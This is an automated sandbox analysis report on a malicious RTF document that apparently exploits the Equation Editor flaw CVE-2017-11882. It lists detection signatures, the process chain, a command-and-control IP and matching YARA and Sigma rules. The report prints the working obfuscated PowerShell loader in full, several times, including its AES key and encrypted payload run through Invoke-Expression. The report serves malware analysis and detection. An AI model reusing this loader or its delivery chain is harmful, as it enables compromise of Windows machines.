Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
e2VMPAayU1.rtf

Overview

General Information

Sample name:e2VMPAayU1.rtf
renamed because original name is a hash value
Original sample name:fbc6766776e17ffa02a6813e4f20b22b.rtf
Analysis ID:1485136
MD5:fbc6766776e17ffa02a6813e4f20b22b
SHA1:58110a9f8f62038bd95eea66c74523320f075176
SHA256:b5d48e4aa15901a84ad2c00a6b6a228471c3e5ad695f7ea11e584afa43543a69
Tags:rtf
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected Powershell download and execute
Document exploit detected (process start blacklist hit)
Found potential equation exploit (CVE-2017-11882)
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2120 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 2188 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 1568 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 2160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'') MD5: EB32C070E658937AA9FA9F3AE629B2B8)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
e2VMPAayU1.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1ea4:$obj2: \objdata
  • 0x1e90:$obj3: \objupdate
  • 0x1e6b:$obj6: \objlink
SourceRuleDescriptionAuthorStrings
C:\Users\user\Desktop\~WRD0000.tmpINDICATOR_RTF_EXPLOIT_CVE_2017_8759_2detects CVE-2017-8759 weaponized RTF documents.ditekSHen
  • 0xcc69:$clsid3: 4d73786d6c322e534158584d4c5265616465722e
  • 0xccb3:$ole2: d0cf11e0a1b11ae1
  • 0x74c9:$obj2: \objdata
  • 0x74a7:$obj4: \objemb
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 2160JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 2160INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x60c0d:$b2: ::FromBase64String(
    • 0x61cd0:$b2: ::FromBase64String(
    • 0xae450:$b2: ::FromBase64String(
    • 0xaf786:$b2: ::FromBase64String(
    • 0xcbda7:$b2: ::FromBase64String(
    • 0xcdb2f:$b2: ::FromBase64String(
    • 0xcde0d:$b2: ::FromBase64String(
    • 0xce146:$b2: ::FromBase64String(
    • 0xce4bd:$b2: ::FromBase64String(
    • 0xce84e:$b2: ::FromBase64String(
    • 0xcf1fc:$b2: ::FromBase64String(
    • 0xcfbb2:$b2: ::FromBase64String(
    • 0xd0589:$b2: ::FromBase64String(
    • 0xd0f78:$b2: ::FromBase64String(
    • 0xd1971:$b2: ::FromBase64String(
    • 0xd23ee:$b2: ::FromBase64String(
    • 0xd2df8:$b2: ::FromBase64String(
    • 0xd37ea:$b2: ::FromBase64String(
    • 0xd41c1:$b2: ::FromBase64String(
    • 0x106099:$b2: ::FromBase64String(
    • 0x109690:$b2: ::FromBase64String(

    Exploits

    barindex
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 172.245.123.11, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2188, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2188, TargetFilename: C:\Users\user\AppData\Roaming\seethemoononlinetoseebeautygir.vBS

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
    Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2188, Protocol: tcp, SourceIp: 172.245.123.11, SourceIsIpv6: false, SourcePort: 80
    Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Edat/CxJndrUfDR9nAWVKhHOI/IYjBgfEpQik9qJZhHmSR22aVO600gw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIOwXrOWTIG5swItg7zFD9OyI4qwNW2DSA+q1jveygII0r57qf0cAj6Ce9uJCuE17ThTAaiQL4mofQp8uqjn3VIIKuKAd9GJB73yLEmkpBpYYcAEu88vSgVZa+wmnQQkoJtUCgSRaHp+XfVoLXIwKzRec6cDmhGQTBR7Ul9x0coyu8fZvCLEzPcJ9SC07ffDROhHuhBSqKcCMGVkwzBfDe4wI4QSXFR0cioaxw4x1d9OiaZdvRlQ7Tvm7FWSdWKap1gku8Ftkup76E06S7qo9mEmw3tQ8qUv7o4vz2iRXs0ziV2zz43kztQlVPWu56KrcwfHZt5wsMDlm6y/kjkAExZm4pluf7YEBU0A9z1FI7c07QhAF50PRC4b0P4vexv0bzhiLdo0tp8cckt4GwIeeQ3GfV2Zur7rf0fU7HcrFcz3hfoXleLocy+JFMy8qqSQjd/XosQ7Loo1qTTpHGyQFWgZS1pB46Tc9lrI4VOxvSWX/GyT8ubH3sMLCMJhQtdXw1sKyOIfbmmuyt6bekgtHwo9BT9lStdzFJJAp8PYU0AY5HRE2jyPLQWpUgsOnPjx2JPl/Sc0H2Tsg6gjn/cwA7+LtvKFZOYNFx30kb9Kkg120+UNFkmS3v8wisgRYUD+sxqWJCaoyPVzWfY584BmtA/Hr64HnPrrWPzoyj9tUJT8UVO3tT9eWx1M9YKsK8yTrjEf02EoWBw4WnUMRgKTnjfFYyMLsg2NnU1oxXqkoItIg2lwGDnOeJETOyEM7C6A+wuPv6mak+vAs/xJ/I0r6OiK7uPQ6AkeYeI5dzZuzjjQCCiZdkfko6mBk4niDu0TENks2a67LZ5FuJ4PbW/s3WrI//butcIDgnv8v1QVa1JGf41+WksQ3kQ4+9Xtf4DrV8TOY/yzMuoBGDp2Ur+Y3a2FqqH6NsjOn1LO8SRnwtJAKYUkfztnQCwdRqbH3gXLyXP4rQrJF639iKh0A6dOiDVbjFbrHrK3HKIv1d5DfX68wT1a2VFCyRRJ6xVCgM6V6abMhOKLbZ+iRrubeGx7Pm2FeTr5cAMo9rGs2qWm0eCHiFGB0Yk+D7U3tkSnZ7mguQUwDjGKV9B7Rpt9c1lK0N1SYOY8kxIH4yniwPWrtZ+l3+PjCwWT0pOlu/ZOV3DLSFAMsJg+fubDUUW6CB+/nfD6nY0TsrkIS8Ix3ddTanSmncNbv4w+qkUAGnU/k/ooziQQFAmfxWERdymw9x5Gz5l/oMs8qneLXH1MjFEGt8BDdzFgL40oSweew0uM1i4dzqqeZfQVqUjd7vet4Pm7LasIM+CNRyw2wAVLCpCorugD9TI6vWDEs0Wp/cxDN70mUygsZqxqn+LYilh1wVOfattE8/DMGxR5Eda